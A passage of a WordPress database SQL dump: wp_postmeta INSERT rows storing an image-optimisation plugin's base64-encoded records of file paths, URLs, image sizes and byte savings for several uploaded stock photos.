1lIjoxNDgzNTQ3MzE4LCJpZCI6MzAxOH0seyJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzExXC9zaHV0dGVyc3RvY2tfNDAxNzc0MTM3LTI1MHgyNTAuanBnIiwid2lkdGgiOjI1MCwiaGVpZ2h0IjoyNTAsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8xMVwvc2h1dHRlcnN0b2NrXzQwMTc3NDEzNy0yNTB4MjUwLmpwZyIsIm1pbWVfdHlwZSI6ImltYWdlXC9qcGVnIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMTFcL3NodXR0ZXJzdG9ja180MDE3NzQxMzctMjUweDI1MC5qcGciLCJyZWR1Y3Rpb24iOjEsInRpbWUiOjE0ODM1NDczMjAsImlkIjozMDE4fSx7ImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMTFcL3NodXR0ZXJzdG9ja180MDE3NzQxMzctMjAweDIwMC5qcGciLCJ3aWR0aCI6MjAwLCJoZWlnaHQiOjIwMCwidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzExXC9zaHV0dGVyc3RvY2tfNDAxNzc0MTM3LTIwMHgyMDAuanBnIiwibWltZV90eXBlIjoiaW1hZ2VcL2pwZWciLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8xMVwvc2h1dHRlcnN0b2NrXzQwMTc3NDEzNy0yMDB4MjAwLmpwZyIsInJlZHVjdGlvbiI6MSwidGltZSI6MTQ4MzU0NzMyMywiaWQiOjMwMTh9LHsiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8xMVwvc2h1dHRlcnN0b2NrXzQwMTc3NDEzNy0yMjV4MjI1LmpwZyIsIndpZHRoIjoyMjUsImhlaWdodCI6MjI1LCJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMTFcL3NodXR0ZXJzdG9ja180MDE3NzQxMzctMjI1eDIyNS5qcGciLCJtaW1lX3R5cGUiOiJpbWFnZVwvanBlZyIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzExXC9zaHV0dGVyc3RvY2tfNDAxNzc0MTM3LTIyNXgyMjUuanBnIiwicmVkdWN0aW9uIjoxLCJ0aW1lIjoxNDgzNTQ3MzI3LCJpZCI6MzAxOH0seyJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzExXC9zaHV0dGVyc3RvY2tfNDAxNzc0MTM3LTUxMHg2MDAuanBnIiwid2lkdGgiOjUxMCwiaGVpZ2h0Ijo2MDAsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8xMVwvc2h1dHRlcnN0b2NrXzQwMTc3NDEzNy01MTB4NjAwLmpwZyIsIm1pbWVfdHlwZSI6ImltYWdlXC9qcGVnIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMTFcL3NodXR0ZXJzdG9ja180MDE3NzQxMzctNTEweDYwMC5qcGciLCJyZWR1Y3Rpb24iOjEsInRpbWUiOjE0ODM1NDczMzEsImlkIjozMDE4fV0='); 
INSERT INTO `wp_postmeta` VALUES (28740, 2990, 'wpfc_optimisation_reduction', '292846'); 
INSERT INTO `wp_postmeta` VALUES (28741, 2990, 'wpfc_optimisation', 'W3siZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8xMVwvc2h1dHRlcnN0b2NrXzEwNjY0NjYxNS5qcGciLCJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMTFcL3NodXR0ZXJzdG9ja18xMDY2NDY2MTUuanBnIiwid2lkdGgiOjEwMDAsImhlaWdodCI6NTYzLCJtaW1lX3R5cGUiOiIiLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8xMVwvc2h1dHRlcnN0b2NrXzEwNjY0NjYxNS5qcGciLCJyZWR1Y3Rpb24iOjI5MjgzOSwidGltZSI6MTQ4MzU0NzM0MSwiaWQiOiIyOTkwIn0seyJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzExXC9zaHV0dGVyc3RvY2tfMTA2NjQ2NjE1LTM0MHgzNDAuanBnIiwid2lkdGgiOjM0MCwiaGVpZ2h0IjozNDAsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8xMVwvc2h1dHRlcnN0b2NrXzEwNjY0NjYxNS0zNDB4MzQwLmpwZyIsIm1pbWVfdHlwZSI6ImltYWdlXC9qcGVnIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMTFcL3NodXR0ZXJzdG9ja18xMDY2NDY2MTUtMzQweDM0MC5qcGciLCJyZWR1Y3Rpb24iOjEsInRpbWUiOjE0ODM1NDczNDUsImlkIjoyOTkwfSx7ImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMTFcL3NodXR0ZXJzdG9ja18xMDY2NDY2MTUtODAweDQ1MC5qcGciLCJ3aWR0aCI6ODAwLCJoZWlnaHQiOjQ1MCwidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzExXC9zaHV0dGVyc3RvY2tfMTA2NjQ2NjE1LTgwMHg0NTAuanBnIiwibWltZV90eXBlIjoiaW1hZ2VcL2pwZWciLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8xMVwvc2h1dHRlcnN0b2NrXzEwNjY0NjYxNS04MDB4NDUwLmpwZyIsInJlZHVjdGlvbiI6MSwidGltZSI6MTQ4MzU0NzM0OCwiaWQiOjI5OTB9LHsiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8xMVwvc2h1dHRlcnN0b2NrXzEwNjY0NjYxNS03Njh4NDMyLmpwZyIsIndpZHRoIjo3NjgsImhlaWdodCI6NDMyLCJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMTFcL3NodXR0ZXJzdG9ja18xMDY2NDY2MTUtNzY4eDQzMi5qcGciLCJtaW1lX3R5cGUiOiJpbWFnZVwvanBlZyIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzExXC9zaHV0dGVyc3RvY2tfMTA2NjQ2NjE1LTc2OHg0MzIuanBnIiwicmVkdWN0aW9uIjoxLCJ0aW1lIjoxNDgzNTQ3MzUwLCJpZCI6Mjk5MH0seyJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzExXC9zaHV0dGVyc3RvY2tfMTA2NjQ2NjE1LTI1MHgyNTAuanBnIiwid2lkdGgiOjI1MCwiaGVpZ2h0IjoyNTAsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8xMVwvc2h1dHRlcnN0b2NrXzEwNjY0NjYxNS0yNTB4MjUwLmpwZyIsIm1pbWVfdHlwZSI6ImltYWdlXC9qcGVnIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMTFcL3NodXR0ZXJzdG9ja18xMDY2NDY2MTUtMjUweDI1MC5qcGciLCJyZWR1Y3Rpb24iOjEsInRpbWUiOjE0ODM1NDczNTIsImlkIjoyOTkwfSx7ImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMTFcL3NodXR0ZXJzdG9ja18xMDY2NDY2MTUtMjAweDIwMC5qcGciLCJ3aWR0aCI6MjAwLCJoZWlnaHQiOjIwMCwidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzExXC9zaHV0dGVyc3RvY2tfMTA2NjQ2NjE1LTIwMHgyMDAuanBnIiwibWltZV90eXBlIjoiaW1hZ2VcL2pwZWciLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8xMVwvc2h1dHRlcnN0b2NrXzEwNjY0NjYxNS0yMDB4MjAwLmpwZyIsInJlZHVjdGlvbiI6MSwidGltZSI6MTQ4MzU0NzM1NCwiaWQiOjI5OTB9LHsiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8xMVwvc2h1dHRlcnN0b2NrXzEwNjY0NjYxNS0yMjV4MjI1LmpwZyIsIndpZHRoIjoyMjUsImhlaWdodCI6MjI1LCJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMTFcL3NodXR0ZXJzdG9ja18xMDY2NDY2MTUtMjI1eDIyNS5qcGciLCJtaW1lX3R5cGUiOiJpbWFnZVwvanBlZyIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzExXC9zaHV0dGVyc3RvY2tfMTA2NjQ2NjE1LTIyNXgyMjUuanBnIiwicmVkdWN0aW9uIjoxLCJ0aW1lIjoxNDgzNTQ3MzU3LCJpZCI6Mjk5MH0seyJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzExXC9zaHV0dGVyc3RvY2tfMTA2NjQ2NjE1LTUxMHg1NjMuanBnIiwid2lkdGgiOjUxMCwiaGVpZ2h0Ijo1NjMsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8xMVwvc2h1dHRlcnN0b2NrXzEwNjY0NjYxNS01MTB4NTYzLmpwZyIsIm1pbWVfdHlwZSI6ImltYWdlXC9qcGVnIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMTFcL3NodXR0ZXJzdG9ja18xMDY2NDY2MTUtNTEweDU2My5qcGciLCJyZWR1Y3Rpb24iOjEsInRpbWUiOjE0ODM1NDczNjAsImlkIjoyOTkwfV0='); 
INSERT INTO `wp_postmeta` VALUES (28742, 2979, 'wpfc_optimisation_reduction', '711403'); 
INSERT INTO `wp_postmeta` VALUES (28743, 2979, 'wpfc_optimisation', 'W3siZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8xMVwvc2h1dHRlcnN0b2NrXzI3NTE2MzI3Mi5qcGciLCJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMTFcL3NodXR0ZXJzdG9ja18yNzUxNjMyNzIuanBnIiwid2lkdGgiOjEwMDAsImhlaWdodCI6NjY3LCJtaW1lX3R5cGUiOiIiLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8xMVwvc2h1dHRlcnN0b2NrXzI3NTE2MzI3Mi5qcGciLCJyZWR1Y3Rpb24iOjcxMTM5NiwidGltZSI6MTQ4MzU0NzM3MSwiaWQiOiIyOTc5In0seyJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzExXC9zaHV0dGVyc3RvY2tfMjc1MTYzMjcyLTM0MHgzNDAuanBnIiwid2lkdGgiOjM0MCwiaGVpZ2h0IjozNDAsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8xMVwvc2h1dHRlcnN0b2NrXzI3NTE2MzI3Mi0zNDB4MzQwLmpwZyIsIm1pbWVfdHlwZSI6ImltYWdlXC9qcGVnIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMTFcL3NodXR0ZXJzdG9ja18yNzUxNjMyNzItMzQweDM0MC5qcGciLCJyZWR1Y3Rpb24iOjEsInRpbWUiOjE0ODM1NDczNzQsImlkIjoyOTc5fSx7ImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMTFcL3NodXR0ZXJzdG9ja18yNzUxNjMyNzItODAweDUzNC5qcGciLCJ3aWR0aCI6ODAwLCJoZWlnaHQiOjUzNCwidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzExXC9zaHV0dGVyc3RvY2tfMjc1MTYzMjcyLTgwMHg1MzQuanBnIiwibWltZV90eXBlIjoiaW1hZ2VcL2pwZWciLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8xMVwvc2h1dHRlcnN0b2NrXzI3NTE2MzI3Mi04MDB4NTM0LmpwZyIsInJlZHVjdGlvbiI6MSwidGltZSI6MTQ4MzU0NzM3NiwiaWQiOjI5Nzl9LHsiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8xMVwvc2h1dHRlcnN0b2NrXzI3NTE2MzI3Mi03Njh4NTEyLmpwZyIsIndpZHRoIjo3NjgsImhlaWdodCI6NTEyLCJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMTFcL3NodXR0ZXJzdG9ja18yNzUxNjMyNzItNzY4eDUxMi5qcGciLCJtaW1lX3R5cGUiOiJpbWFnZVwvanBlZyIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzExXC9zaHV0dGVyc3RvY2tfMjc1MTYzMjcyLTc2OHg1MTIuanBnIiwicmVkdWN0aW9uIjoxLCJ0aW1lIjoxNDgzNTQ3MzgyLCJpZCI6Mjk3OX0seyJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzExXC9zaHV0dGVyc3RvY2tfMjc1MTYzMjcyLTI1MHgyNTAuanBnIiwid2lkdGgiOjI1MCwiaGVpZ2h0IjoyNTAsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8xMVwvc2h1dHRlcnN0b2NrXzI3NTE2MzI3Mi0yNTB4MjUwLmpwZyIsIm1pbWVfdHlwZSI6ImltYWdlXC9qcGVnIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMTFcL3NodXR0ZXJzdG9ja18yNzUxNjMyNzItMjUweDI1MC5qcGciLCJyZWR1Y3Rpb24iOjEsInRpbWUiOjE0ODM1NDczODYsImlkIjoyOTc5fSx7ImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMTFcL3NodXR0ZXJzdG9ja18yNzUxNjMyNzItMjAweDIwMC5qcGciLCJ3aWR0aCI6MjAwLCJoZWlnaHQiOjIwMCwidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzExXC9zaHV0dGVyc3RvY2tfMjc1MTYzMjcyLTIwMHgyMDAuanBnIiwibWltZV90eXBlIjoiaW1hZ2VcL2pwZWciLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8xMVwvc2h1dHRlcnN0b2NrXzI3NTE2MzI3Mi0yMDB4MjAwLmpwZyIsInJlZHVjdGlvbiI6MSwidGltZSI6MTQ4MzU0NzM4OCwiaWQiOjI5Nzl9LHsiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8xMVwvc2h1dHRlcnN0b2NrXzI3NTE2MzI3Mi0yMjV4MjI1LmpwZyIsIndpZHRoIjoyMjUsImhlaWdodCI6MjI1LCJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMTFcL3NodXR0ZXJzdG9ja18yNzUxNjMyNzItMjI1eDIyNS5qcGciLCJtaW1lX3R5cGUiOiJpbWFnZVwvanBlZyIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzExXC9zaHV0dGVyc3RvY2tfMjc1MTYzMjcyLTIyNXgyMjUuanBnIiwicmVkdWN0aW9uIjoxLCJ0aW1lIjoxNDgzNTQ3MzkxLCJpZCI6Mjk3OX0seyJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzExXC9zaHV0dGVyc3RvY2tfMjc1MTYzMjcyLTUxMHg2MDAuanBnIiwid2lkdGgiOjUxMCwiaGVpZ2h0Ijo2MDAsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8xMVwvc2h1dHRlcnN0b2NrXzI3NTE2MzI3Mi01MTB4NjAwLmpwZyIsIm1pbWVfdHlwZSI6ImltYWdlXC9qcGVnIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMTFcL3NodXR0ZXJzdG9ja18yNzUxNjMyNzItNTEweDYwMC5qcGciLCJyZWR1Y3Rpb24iOjEsInRpbWUiOjE0ODM1NDczOTQsImlkIjoyOTc5fV0='); 
INSERT INTO `wp_postmeta` VALUES (28744, 2937, 'wpfc_optimisation_reduction', '417096'); 
INSERT INTO `wp_postmeta` VALUES (28745, 2937, 'wpfc_optimisation', 'W3siZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8xMVwvc2h1dHRlcnN0b2NrXzM1ODQ0NzgyMC0xLmpwZyIsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8xMVwvc2h1dHRlcnN0b2NrXzM1ODQ0NzgyMC0xLmpwZyIsIndpZHRoIjoxMDAwLCJoZWlnaHQiOjY2NywibWltZV90eXBlIjoiIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMTFcL3NodXR0ZXJzdG9ja18zNTg0NDc4MjAtMS5qcGciLCJyZWR1Y3Rpb24iOjQxNzA4OSwidGltZSI6MTQ4MzU0NzQxMCwiaWQiOiIyOTM3In0seyJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzExXC9zaHV0dGVyc3RvY2tfMzU4NDQ3ODIwLTEtMzQweDM0MC5qcGciLCJ3aWR0aCI6MzQwLCJoZWlnaHQiOjM0MCwidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzExXC9zaHV0dGVyc3RvY2tfMzU4NDQ3ODIwLTEtMzQweDM0MC5qcGciLCJtaW1lX3R5cGUiOiJpbWFnZVwvanBlZyIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzExXC9zaHV0dGVyc3RvY2tfMzU4NDQ3ODIwLTEtMzQweDM0MC5qcGciLCJyZWR1Y3Rpb24iOjEsInRpbWUiOjE0ODM1NDc0MTMsImlkIjoyOTM3fSx7ImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMTFcL3NodXR0ZXJzdG9ja18zNTg0NDc4MjAtMS04MDB4NTM0LmpwZyIsIndpZHRoIjo4MDAsImhlaWdodCI6NTM0LCJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMTFcL3NodXR0ZXJzdG9ja18zNTg0NDc4MjAtMS04MDB4NTM0LmpwZyIsIm1pbWVfdHlwZSI6ImltYWdlXC9qcGVnIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMTFcL3NodXR0ZXJzdG9ja18zNTg0NDc4MjAtMS04MDB4NTM0LmpwZyIsInJlZHVjdGlvbiI6MSwidGltZSI6MTQ4MzU0NzQxNiwiaWQiOjI5Mzd9LHsiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8xMVwvc2h1dHRlcnN0b2NrXzM1ODQ0NzgyMC0xLTc2OHg1MTIuanBnIiwid2lkdGgiOjc2OCwiaGVpZ2h0Ijo1MTIsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8xMVwvc2h1dHRlcnN0b2NrXzM1ODQ0NzgyMC0xLTc2OHg1MTIuanBnIiwibWltZV90eXBlIjoiaW1hZ2VcL2pwZWciLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8xMVwvc2h1dHRlcnN0b2NrXzM1ODQ0NzgyMC0xLTc2OHg1MTIuanBnIiwicmVkdWN0aW9uIjoxLCJ0aW1lIjoxNDgzNTQ3NDE5LCJpZCI6MjkzN30seyJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzExXC9zaHV0dGVyc3RvY2tfMzU4NDQ3ODIwLTEtMjUweDI1MC5qcGciLCJ3aWR0aCI6MjUwLCJoZWlnaHQiOjI1MCwidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzExXC9zaHV0dGVyc3RvY2tfMzU4NDQ3ODIwLTEtMjUweDI1MC5qcGciLCJtaW1lX3R5cGUiOiJpbWFnZVwvanBlZyIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzExXC9zaHV0dGVyc3RvY2tfMzU4NDQ3ODIwLTEtMjUweDI1MC5qcGciLCJyZWR1Y3Rpb24iOjEsInRpbWUiOjE0ODM1NDc0MjIsImlkIjoyOTM3fSx7ImZpb